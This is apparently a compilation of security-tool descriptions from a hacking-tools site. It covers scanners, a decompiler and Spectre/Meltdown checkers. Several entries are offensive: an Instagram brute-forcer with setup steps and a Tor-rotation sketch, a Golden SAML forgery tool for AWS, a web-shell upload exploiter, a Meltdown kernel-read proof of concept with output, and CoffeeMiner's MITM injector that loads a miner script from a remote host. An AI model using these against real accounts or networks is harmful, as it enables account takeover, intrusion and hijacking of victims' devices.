
CMSsc4n v2.0 - Tool to identify if a domain is a CMS such as Wordpress, Moodle, Joomla, Drupal or Prestashop


Tool to identify whether a domain runs a CMS and determine its version.
At the moment, the CMSs supported by CMSsc4n are WordPress, Moodle, Joomla, Drupal and PrestaShop.

Installation
You can download the latest version of CMSsc4n by cloning the GitHub repository:
 git clone https://github.com/n4xh4ck5/CMSsc4n.git 
Install the dependencies via pip:
 pip install -r requirements.txt 

Usage
python cmssc4n.py -h
usage: cmssc4n.py [-h] [-e EXPORT] [-c CMS] -i INPUT

This tool verifies if the domain is a CMS (Wordpress, Drupal, Joomla, Prestashop or Moodle) and returns the version

optional arguments:
-h, --help show this help message and exit
-e EXPORT, --export EXPORT
Export the results to a file in xlsx format (y/n)
-c CMS, --cms CMS Identify a CMS: W-Wordpress, J-Joomla, D-Drupal, M-Moodle or P-PrestaShop. Default: All
-i INPUT, --input INPUT
Input file in txt or json format with the domains to analyze
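
For illustration, here is a minimal Python sketch of the fingerprinting idea behind this kind of tool: probe a few CMS-specific paths and scrape a version string. The paths and regexes below are illustrative assumptions, not CMSsc4n's actual signature set.

import re
import requests

FINGERPRINTS = {
    "WordPress": ("/readme.html", re.compile(r"[Vv]ersion (\d+\.\d+(?:\.\d+)?)")),
    "Joomla": ("/administrator/manifests/files/joomla.xml",
               re.compile(r"<version>([\d.]+)</version>")),
    "Drupal": ("/CHANGELOG.txt", re.compile(r"Drupal (\d+\.\d+)")),
}

def identify_cms(domain):
    # Try each known CMS marker path; a 200 response plus a version match is a hit
    for cms, (path, version_re) in FINGERPRINTS.items():
        try:
            r = requests.get(f"https://{domain}{path}", timeout=5)
        except requests.RequestException:
            continue
        if r.status_code == 200:
            match = version_re.search(r.text)
            return cms, match.group(1) if match else "unknown"
    return None, None

print(identify_cms("example.com"))  # placeholder domain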



Decodify - Detect And Decode Encoded Strings Recursively

Decodify can detect and decode encoded strings, recursively. It's currently in beta.
Let's take the string teamultimate.in and encode it with Hex, URL, Base64 and FromChar encoding, respectively.

Now let's pass this encoded string to Decodify:


Boom! That's what Decodify does.

Supported Encodings and Encryptions
  • Caesar ciphers
  • Binary
  • Hex
  • Decimal
  • Base64
  • URL
  • FromChar
  • MD5
  • SHA1
  • SHA2

Decoding Caesar Cipher
You can supply the offset with the --rot option, or tell Decodify to try offsets 1-20 by using --rot all
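
To illustrate what --rot all does, here is a small standalone sketch (not Decodify's own code) that tries every offset in the 1-20 range and prints each candidate plaintext:

def caesar_decode(text, offset):
    # Shift alphabetic characters back by 'offset', leaving everything else intact
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - offset) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

ciphertext = "whdpxowlpdwh.lq"  # "teamultimate.in" shifted by 3
for offset in range(1, 21):
    print(offset, caesar_decode(ciphertext, offset))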

Installing Decodify
Download Decodify with the following command:
git clone https://github.com/UltimateHackers/Decodify
Now switch to the Decodify directory and run the installer with this command:
cd Decodify && chmod +x ./setup.sh && ./setup.sh
Now you can run Decodify by entering dcode in your terminal.


Instagram-Py - Simple Instagram Brute Force Script


Instagram-Py is a simple Python script to perform basic brute force attacks against Instagram.
The script can bypass login limiting on wrong passwords, so it can effectively test an unlimited number of passwords.
Instagram-Py has been proven to test over 6M passwords on a single Instagram account while using as few resources as possible.
The script mimics the activities of the official Instagram Android app and sends requests over Tor so you are secure; but if your Tor installation is misconfigured, the blame is on you.
Depends on: python3, tor, requests, requests[socks], stem

Installation

Using pip to get Instagram-Py

Make sure you have the latest versions of pip (>= 9.0) and Python (>= 3.6)
$ sudo easy_install3 -U pip # you have to install python3-setuptools , update pip
$ sudo pip3 install requests --upgrade
$ sudo pip3 install requests[socks]
$ sudo pip3 install stem
$ sudo pip3 install instagram-py
$ instagram-py # installed successfully
$ # Now let's copy the config file to your hard drive!
$ wget -O ~/instapy-config.json "https://git.io/v5DGy"


Configuring Instagram-Py
Open the configuration file located in your home directory at ~/instapy-config.json. This file is very important; do not change anything except the tor configuration.
$ vim ~/instapy-config.json # open it with your favorite text editor!
The configuration file looks like this:
{
    "api-url" : "https://i.instagram.com/api/v1/",
    "user-agent" : "Instagram 10.26.0 Android (18/4.3; 320dp..... ",
    "ig-sig-key" : "4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178",
    "ig-sig-version" : "4",
    "tor" : {
        "server" : "127.0.0.1",
        "port" : "9050",
        "protocol" : "socks5",
        "control" : {
            "password" : "",
            "port" : "9051"
        }
    }
}
api-url: do not change this unless you know what you are doing
user-agent: do not change this unless you know your stuff
ig-sig-key: never change this unless there is a new release; it is extracted from the Instagram apk file
tor: change everything according to your Tor server configuration; do not mess it up!


Configuring Tor server to open control port
open your tor configuration file usually located at /etc/tor/torrc
$ sudo vim /etc/tor/torrc # open it with your text editor
search for the file for this specific section
## The port on which Tor will listen for local connections from Tor
## controller applications, as documented in control-spec.txt.
#ControlPort 9051
uncomment 'ControlPort' by deleting the # before 'ControlPort' , now save the file and restart your tor server
now you are ready to crack any instagram account , make sure your tor configuration matched ~/instapy-config.json
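
As a hedged illustration of why the control port matters: with ControlPort 9051 open, a script can ask Tor for a fresh circuit (and therefore a fresh exit IP) between login attempts using stem. This is a minimal sketch, not Instagram-Py's internals:

from stem import Signal
from stem.control import Controller

# Values match the "tor.control" section of instapy-config.json above
with Controller.from_port(address="127.0.0.1", port=9051) as controller:
    controller.authenticate(password="")  # the "control.password" value
    controller.signal(Signal.NEWNYM)      # request a new identity / exit IP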


Usage
Finally, you can use Instagram-Py!
$ instagram-py your_account_username path_to_password_list



Reposcanner - Python Script To Scan Git Repos For Interesting Strings


Reposcanner is a Python script that searches through the commit history of Git repositories looking for interesting strings such as API keys, inspired by truffleHog.

Installation
The python Git module is required (python-git on Debian).

Usage
./reposcanner -r <repository>
Options:
optional arguments:
-h, --help show this help message and exit
-r REPO, --repo REPO Repo to scan
-c COUNT, --count COUNT Number of commits to scan (default 500)
-e ENTROPY, --entropy ENTROPY Minimum entropy to report (default 4.3)
-l LENGTH, --length LENGTH Maximum line length (default 500)
-a, --all-branches Scan all branches
-b BRANCH, --branch BRANCH Scan a specific branch
-v, --verbose Verbose output
Example:
./reposcanner.py -r https://github.com/Dionach/reposcanner -v -a -c 30


RetDec - A Retargetable Machine-Code Decompiler


RetDec is a retargetable machine-code decompiler based on LLVM.
The decompiler is not limited to any particular target architecture, operating system, or executable file format:
  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code.
  • Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC.

Features:
  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.
For more information, check out the project's wiki.

Installation and Use
Currently, we support only Windows (7 or later), Linux, and unofficially macOS.
Warning: Decompilations of larger binaries (1 MB or more) may require a lot of RAM. When running decompilations, we advise you to limit the maximal virtual memory for processes before decompiling to prevent potential swapping and unresponsiveness. On Linux, you can run e.g. ulimit -Sv 9863168 in your shell to limit the maximal virtual memory to 8 GB.

Windows
  1. Either download and unpack a pre-built package from the following list, or build and install the decompiler by yourself (the process is described below):
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install MSYS2 and other needed applications by following RetDec's Windows environment setup guide.
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALL_DIR/bin and run:
    bash decompile.sh test.exe
    For more information, run bash decompile.sh --help.

Linux
  1. There are currently no pre-built packages for Linux. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages via your distribution's package manager:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALL_DIR/bin and run:
    ./decompile.sh test.exe
    For more information, run ./decompile.sh --help.

macOS
Warning: the macOS build was added based on community feedback and is not directly supported by the RetDec team. We do not guarantee that these instructions will work for you. If you encounter any problem with your build, submit an issue so the macOS community can help you out.
  1. There are currently no pre-built packages for macOS. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALL_DIR/bin and run:
    # /usr/local/bin/bash if installed via Homebrew
    /path/to/gnu/bash ./decompile.sh test.exe
    For more information, run ./decompile.sh --help.

Build and Installation
This section describes a manual build and installation of RetDec.

Requirements

Linux
On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:
sudo apt-get install build-essential cmake git perl python3 bash coreutils wget bc doxygen graphviz upx flex bison zlib1g-dev libtinfo-dev autoconf automake pkg-config m4 libtool
On RPM-based distributions (e.g. Fedora), the required packages can be installed with dnf:
sudo dnf install git cmake make gcc gcc-c++ perl python3 bash zlib-devel flex bison m4 coreutils autoconf automake libtool ncurses-devel wget bc doxygen graphviz upx pkg-config
On Arch Linux, the required packages can be installed with pacman:
sudo pacman -S base-devel cmake git perl python3 bash coreutils wget bc doxygen graphviz upx flex bison zlib ncurses autoconf automake pkg-config m4 libtool

Windows
  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • Git
  • MSYS2 and some other applications. Follow RetDec's Windows environment setup guide to get everything you need on Windows.
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin.
  • Python (version >= 3.4)

macOS
  • Full Xcode installation (Command Line Tools are untested)
  • CMake (version >= 3.6)
  • Newer versions of Bison and Flex, preferably installed via Homebrew
  • wget
  • Python (version >= 3.4, macOS has 2.7)

Process
Warning: Currently, RetDec has to be installed into a clean, dedicated directory. Do NOT install it into /usr, /usr/local, etc. because our build system is not yet ready for system-wide installations. So, when running cmake, always set -DCMAKE_INSTALL_PREFIX=<path> to a directory that will be used just by RetDec. For more details, see #12.
  • Recursively clone the repository (it contains submodules):
    • git clone --recursive https://github.com/avast-tl/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
  • Windows:
    • Open MSBuild command prompt, or any terminal that is configured to run the msbuild command.
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • msbuild /m /p:Configuration=Release retdec.sln
    • msbuild /m /p:Configuration=Release INSTALL.vcxproj
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE.
  • macOS:
    • cd retdec
    • mkdir build && cd build
    • # Apple ships old Flex & Bison, so Homebrew versions should be used.
      export CMAKE_INCLUDE_PATH="/usr/local/opt/flex/include"
      export CMAKE_LIBRARY_PATH="/usr/local/opt/flex/lib;/usr/local/opt/bison/lib"
      export PATH="/usr/local/opt/flex/bin:/usr/local/opt/bison/bin:$PATH"
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
You have to pass the following parameters to cmake:
  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>.
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.
You can pass the following additional parameters to cmake:
  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests, including all the tests in dependency submodules (disabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in the Release mode. This has no effect on Windows, but the same thing can be achieved by running msbuild with the /p:Configuration=Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).

Repository Overview
This repository contains the following libraries:
  • bin2llvmir -- library of LLVM passes for translating binaries into LLVM IR modules.
  • debugformat -- library for uniform representation of DWARF and PDB debugging information.
  • dwarfparser -- library for high-level representation of DWARF debugging information.
  • llvm-support -- set of LLVM related utility functions.
  • llvmir2hll -- library for translating LLVM IR modules to high-level source codes (C, Python-like language).
This repository contains the following tools:
  • bin2llvmirtool -- frontend for the bin2llvmir library.
  • llvm2hlltool -- frontend for the llvmir2hll library.
This repository contains the following scripts:
  • decompile.sh -- the main decompilation script binding it all together. This is the tool to use for full binary-to-C decompilations.
  • Support scripts used by decompile.sh:
    • color-c.py -- decorates output C sources with IDA color tags -- syntax highlighting for IDA.
    • config.sh -- decompiler's configuration file.
    • decompile-archive.sh -- decompiles objects in the given AR archive.
    • fileinfo.sh -- a Fileinfo tool wrapper.
    • signature-from-library.sh -- extracts function signatures from the given library.
    • unpack.sh -- tries to unpack the given executable file by using any of the supported unpackers.
  • Other utility scripts:
    • decompile-all.sh -- decompiles all executables in the given directory and subdirectories.
    • run-unit-test.sh -- runs all tests in the unit test directory.
    • utils.sh -- a collection of bash utilities.

Related Repositories
  • retdec-idaplugin -- embeds RetDec into IDA (Interactive Disassembler) and makes its use much easier.
  • retdec-regression-tests-framework -- provides means to run and create regression tests for RetDec and related tools. This is a must if you plan to contribute to the RetDec project.
  • retdec-python -- Python library and tools providing easy access to our online decompilation service through its REST API.
  • vim-syntax-retdecdsm -- Vim syntax-highlighting file for the output from the RetDec's disassembler (.dsm files).


shimit - A tool that implements the Golden SAML attack


shimit is a Python tool that implements the Golden SAML attack. More information on this can be found in the following article on our blog.
python .\shimit.py -h
usage: shimit.py [-h] -pk KEY [-c CERT] [-sp SP] -idp IDP -u USER [-reg REGION]
[--SessionValidity SESSION_VALIDITY] [--SamlValidity SAML_VALIDITY] -n SESSION_NAME
-r ROLES -id ARN [-o OUT_FILE] [-l LOAD_FILE] [-t TIME]

██╗ ███████╗██╗ ██╗██╗███╗ ███╗██╗████████╗ ██╗ ██╗
██╔╝ ██╔════╝██║ ██║██║████╗ ████║██║╚══██╔══╝ ██╔╝ ╚██╗
██╔╝ ███████╗███████║██║██╔████╔██║██║ ██║ ██╔╝ ╚██╗
╚██╗ ╚════██║██╔══██║██║██║╚██╔╝██║██║ ██║ ██╔╝ ██╔╝
╚██╗ ███████║██║ ██║██║██║ ╚═╝ ██║██║ ██║ ██╔╝ ██╔╝
╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝

Overview
In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application.
shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider, more are in the works...

AWS
After generating and signing the SAMLResponse's assertion, shimit will call the AssumeRoleWithSAML() API in AWS. Then, the session token and key will be applied to a new session, where the user can use the AWS CLI to perform actions with the permissions obtained via the golden SAML.
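
A minimal sketch of that AWS step, assuming a signed, encoded SAMLResponse has already been produced (for example via the -o option described below); the ARNs are placeholders and this is not shimit's own code:

import boto3

# Placeholder input: the encoded SAMLResponse, e.g. as written by shimit's -o option
saml_assertion = open("saml_response.xml").read()

sts = boto3.client("sts")
resp = sts.assume_role_with_saml(
    RoleArn="arn:aws:iam::123456789012:role/ADFS-admin",          # placeholder ARN
    PrincipalArn="arn:aws:iam::123456789012:saml-provider/ADFS",  # placeholder ARN
    SAMLAssertion=saml_assertion,
)
creds = resp["Credentials"]  # AccessKeyId, SecretAccessKey, SessionToken for the AWS CLI session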

Requirements:
To install the required modules, run the following command:
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

AWS cli
Needs to be installed in order to use the credentials obtained. Can be downloaded for Windows or Linux from these links.

Usage:

Apply session for AWS cli
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust
pk - Private key file full path (pem format)
c - Certificate file full path (pem format)
u - User and domain name e.g. domain\username (use \ or quotes in *nix)
n - Session name in AWS
r - Desired roles in AWS. Supports multiple roles; the first one specified will be assumed.
id - AWS account id e.g. 123456789012

Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o - Output encoded SAMLResponse to a specified file path

Load SAMLResponse from file
python .\shimit.py -l saml_response.xml
l - Load SAMLResponse from a specified file path

Contributions
shimit supports AWS as a service provider at the moment, as a PoC. We highly encourage you to contribute new modules for other service providers.


fuxploider - File Upload Vulnerability Scanner And Exploitation Tool


fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload form flaws. The tool detects which file types are allowed to be uploaded and which technique will work best to upload web shells or other malicious files onto the desired web server.
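
The core detection idea can be sketched in a few lines of Python (an illustration, not fuxploider's code; the target URL, form field name and rejection marker are assumptions about a hypothetical target):

import requests

UPLOAD_URL = "https://target.example/upload.php"  # hypothetical upload form
EXTENSIONS = ["jpg", "php", "php5", "phtml", "php.jpg", "pHp"]

for ext in EXTENSIONS:
    # Submit the same harmless payload under different extensions
    files = {"file": (f"probe.{ext}", b"probe-content", "image/jpeg")}
    r = requests.post(UPLOAD_URL, files=files, timeout=10)
    rejected = "wrong file type" in r.text.lower()  # assumed rejection marker, cf. --not-regex below
    print(f".{ext}: {'rejected' if rejected else 'possibly accepted'}")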

Installation
git clone https://github.com/almandin/fuxploider.git
cd fuxploider
pip3 install -r requirements.txt

Usage
To get a list of basic options and switches use:
python fuxploider.py -h
Basic example:
python fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"


In-Spectre-Meltdown - Tool to identify Meltdown & Spectre Vulnerabilities in processors



This tool checks for the speculative execution side-channel attacks that affect many modern processors and operating system designs. CVE-2017-5754 (Meltdown) and CVE-2017-5715 (Spectre) allow unprivileged processes to steal secrets from privileged processes. These attacks present 3 different ways of attacking data protection measures on CPUs, enabling attackers to read data they shouldn't be able to.




Please note:
This solution has been tested successfully using Python 3.6.3 & PowerShell version 5.1.

How do I use this?
  • Run the python code or download the executable from the releases section and run it as an administrator user.
  • Press Number 1, 2, 3 & 4 in sequence to see the results.
  • Press 1: Sets the execution policy to unrestricted.
  • Press 2: Imports necessary PowerShell modules
  • Press 3: Installs Spectre related modules within PowerShell
  • Press 4: Inspects control settings for Spectre & Meltdown and displays result
  • Press 5: Exit from the program

Do I need to run the executable as administrator?
  • Yes. Right-click on "In-Spectre_meltdown.exe" and run it as administrator to get the results.

Questions?
Twitter: https://twitter.com/maniarviral
LinkedIn: https://au.linkedin.com/in/viralmaniar



Meltdown Exploit PoC


Speculative optimizations execute code in a non-secure manner leaving data traces in microarchitecture such as cache.

Refer to the paper by Lipp et al., 2017 for details: https://meltdownattack.com/meltdown.pdf.

Can only dump linux_proc_banner at the moment, since the attack requires the accessed memory to be in the cache, and linux_proc_banner is cached on every read from /proc/version. Might work with prefetch.
Build with make, run with ./run.sh.

Can't defeat KASLR yet, so you may need to enter your password to find linux_proc_banner in /proc/kallsyms (or do it manually).

The Flush+Reload and target array approach is taken from the Spectre paper (https://spectreattack.com/spectre.pdf), implemented following clues from https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
Pandora's box is open.

Result:
$ make
cc -O2 -msse2 -c -o meltdown.o meltdown.c
cc meltdown.o -o meltdown
$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk
/linux_proc_banner/ {
if (strtonum("0x"$1))
print $1;
exit 0;
} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 158
model name : Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping : 9
microcode : 0x5e
cpu MHz : 3499.316
cache size : 6144 KB
physical id : 0

Does not work
If it compiles but fails with Illegal instruction then either your hardware is very old or it is a VM. Try compiling with:
$ make CFLAGS=-DHAVE_RDTSCP=0 clean all

Works on
The list of CPUs it works on has moved here: https://github.com/paboldin/meltdown-exploit/issues/19


Spectre-Meltdown-Checker - Spectre & Meltdown Vulnerability/Mitigation Checker For Linux


A simple shell script to tell if your Linux installation is vulnerable to the 3 "speculative execution" CVEs:

CVE-2017-5753 bounds check bypass (Spectre Variant 1)
  • Impact: Kernel & all software
  • Mitigation: recompile software and kernel with a modified compiler that introduces the LFENCE opcode at the proper positions in the resulting code
  • Performance impact of the mitigation: negligible

CVE-2017-5715: branch target injection (Spectre Variant 2)
  • Impact: Kernel
  • Mitigation 1: new opcode via microcode update that should be used by up to date compilers to protect the BTB (by flushing indirect branch predictors)
  • Mitigation 2: introducing "retpoline" into compilers, and recompile software/OS with it
  • Performance impact of the mitigation: high for mitigation 1, medium for mitigation 2, depending on your CPU

CVE-2017-5754: rogue data cache load (Meltdown)
  • Impact: Kernel
  • Mitigation: updated kernel (with PTI/KPTI patches), updating the kernel is enough
  • Performance impact of the mitigation: low to medium
Example of the output of the script:
$ sudo ./spectre-meltdown-checker.sh
Spectre and Meltdown mitigation detection tool v0.09

CVE-2017-5753 [bounds check bypass] aka 'Spectre Variant 1'
* Kernel compiled with LFENCE opcode inserted at the proper places: NO (only 38 opcodes found, should be >= 60)
> STATUS: VULNERABLE

CVE-2017-5715 [branch target injection] aka 'Spectre Variant 2'
* Mitigation 1
* Hardware (CPU microcode) support for mitigation: NO
* Kernel support for IBRS: NO
* IBRS enabled for Kernel space: NO
* IBRS enabled for User space: NO
* Mitigation 2
* Kernel compiled with retpolines: NO
> STATUS: VULNERABLE (IBRS hardware + kernel support OR kernel with retpolines are needed to mitigate the vulnerability)

CVE-2017-5754 [rogue data cache load] aka 'Meltdown' aka 'Variant 3'
* Kernel supports Page Table Isolation (PTI): YES
* PTI enabled and active: YES
> STATUS: NOT VULNERABLE (PTI mitigates the vulnerability)
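
As a complementary check (not part of the script itself): kernels from early 2018 onward expose mitigation status directly through sysfs, which a few lines of Python can read:

from pathlib import Path

base = Path("/sys/devices/system/cpu/vulnerabilities")
if base.is_dir():
    for entry in sorted(base.iterdir()):  # e.g. meltdown, spectre_v1, spectre_v2
        print(f"{entry.name}: {entry.read_text().strip()}")
else:
    print("sysfs vulnerability reporting not available on this kernel")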


Wapiti 3.0.0 - The Web-Application Vulnerability Scanner


Wapiti allows you to audit the security of your websites or web applications.
It performs "black-box" scans (it does not study the source code) of the web application by crawling the webpages of the deployed webapp, looking for scripts and forms where it can inject data.

Once it has the list of URLs, forms and their inputs, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.
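
As a toy illustration of that fuzzing loop (not Wapiti's actual engine; the URL and parameters are made up), inject a marker payload into each parameter and check whether it comes back reflected unescaped:

import requests

url = "https://target.example/search"   # hypothetical target
params = {"q": "test", "page": "1"}
payload = "<script>alert('probe')</script>"

for name in params:
    # Fuzz one parameter at a time, keeping the others at benign values
    fuzzed = dict(params, **{name: payload})
    r = requests.get(url, params=fuzzed, timeout=10)
    if payload in r.text:
        print(f"parameter '{name}' reflects the payload unescaped (possible XSS)")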

What's new in Wapiti 3.0.0?

Wapiti can detect the following vulnerabilities:
  • File disclosure (Local and remote include/require, fopen, readfile...)
  • Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
  • XSS (Cross Site Scripting) injection (reflected and permanent)
  • Command Execution detection (eval(), system(), passthru()...)
  • CRLF Injection (HTTP Response Splitting, session fixation...)
  • XXE (XML External Entity) injection
  • Use of known potentially dangerous files (thanks to the Nikto database)
  • Weak .htaccess configurations that can be bypassed
  • Presence of backup files giving sensitive information (source code disclosure)
  • Shellshock (aka Bash bug)
A buster module also allows brute forcing directory and file names on the target webserver.

Wapiti supports both GET and POST HTTP methods for attacks.
It also supports multipart forms and can inject payloads in filenames (upload).
Warnings are raised when an anomaly is found (for example 500 errors and timeouts).
Wapiti is able to differentiate between permanent and reflected XSS vulnerabilities.


General features:
  • Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...)
  • Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases)
  • Can give you colors in the terminal to highlight vulnerabilities
  • Different levels of verbosity
  • Fast and easy way to activate/deactivate attack modules
  • Adding a payload can be as easy as adding a line to a text file

Browsing features:
  • Support for HTTP, HTTPS and SOCKS5 proxies
  • Authentication via several methods: Basic, Digest, Kerberos or NTLM
  • Ability to restrict the scope of the scan (domain, folder, page, url)
  • Automatic removal of one or more parameters in URLs
  • Multiple safeguards against endless scan loops (for example, a limit on the number of values for a parameter)
  • Possibility to set the first URLs to explore (even if not in scope)
  • Can exclude some URLs from the scan and attacks (e.g. a logout URL)
  • Import of cookies (get them with the wapiti-getcookie tool)
  • Can activate / deactivate SSL certificate verification
  • Extract URLs from Flash SWF files
  • Try to extract URLs from javascript (very basic JS interpreter)
  • HTML5 aware (understands recent HTML tags)
  • Several options to control the crawler behavior and limits.
  • Skipping some parameter names during attack.
  • Setting a maximum time for the scan process.
  • Adding custom HTTP headers or setting a custom User-Agent.

Wapiti is a command-line application.
Here is an example of output against a vulnerable web application.
You may find some useful information in the README and the INSTALL files.
Have any questions? You may find answers in the FAQ

Usage

██╗    ██╗ █████╗ ██████╗ ██╗████████╗██╗██████╗ 
██║ ██║██╔══██╗██╔══██╗██║╚══██╔══╝██║╚════██╗
██║ █╗ ██║███████║██████╔╝██║ ██║ ██║ █████╔╝
██║███╗██║██╔══██║██╔═══╝ ██║ ██║ ██║ ╚═══██╗
╚███╔███╔╝██║ ██║██║ ██║ ██║ ██║██████╔╝
╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═════╝
Wapiti-3.0.0 (wapiti.sourceforge.net)
usage: wapiti [-h] [-u URL] [--scope {page,folder,domain,url}]
[-m MODULES_LIST] [--list-modules] [-l LEVEL] [-p PROXY_URL]
[-a CREDENTIALS] [--auth-type {basic,digest,kerberos,ntlm}]
[-c COOKIE_FILE] [--skip-crawl] [--resume-crawl]
[--flush-attacks] [--flush-session] [-s URL] [-x URL]
[-r PARAMETER] [--skip PARAMETER] [-d DEPTH]
[--max-links-per-page MAX] [--max-files-per-dir MAX]
[--max-scan-time MINUTES] [--max-parameters MAX] [-S FORCE]
[-t SECONDS] [-H HEADER] [-A AGENT] [--verify-ssl {0,1}]
[--color] [-v LEVEL] [-f FORMAT] [-o OUTPUT_PATH]
[--no-bugreport] [--version]
wapiti: error: one of the arguments -u/--url --list-modules is required

Shortest way (with default options) to launch a Wapiti scan:
wapiti -u http://target/

Every option is detailed in the wapiti(1) manpage.
Wapiti also comes with a utility to fetch cookies from websites called wapiti-getcookie. The corresponding manpage is here.


CoffeeMiner - Collaborative (MITM) Cryptocurrency Mining Pool In Wifi Networks


Warning: this project is for academic/research purposes only.
A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

Concept
  • Performs a MITM attack against all selected victims
  • Injects a JS script into all the HTML pages requested by the victims
  • The injected JS script contains a cryptocurrency miner (a sketch of the injector idea follows this list)
  • All the victim devices connected to the LAN will be mining for the CoffeeMiner
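
A rough sketch of what an injector addon like injector.py does with mitmproxy (an illustration, not the project's actual file; the script URL matches the example in the Use section below):

from mitmproxy import http

SCRIPT_TAG = '<script src="http://10.0.2.20:8000/script.js"></script>'

def response(flow: http.HTTPFlow) -> None:
    # Only touch HTML responses: append the miner script just before </body>
    if "text/html" in flow.response.headers.get("content-type", ""):
        html = flow.response.get_text()
        flow.response.set_text(html.replace("</body>", SCRIPT_TAG + "</body>"))

An addon like this would be run with mitmdump -s <file>, much like the mitmdump invocation shown below.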

Use
  • install.sh
bash install.sh
  • edit victims.txt with one IP per line
  • edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
  • execute coffeeMiner.py
python3 coffeeMiner.py ipgateway



Complete instructions for an academic scenario can be found at https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md



Anubis - Subdomain Enumeration And Information Gathering Tool


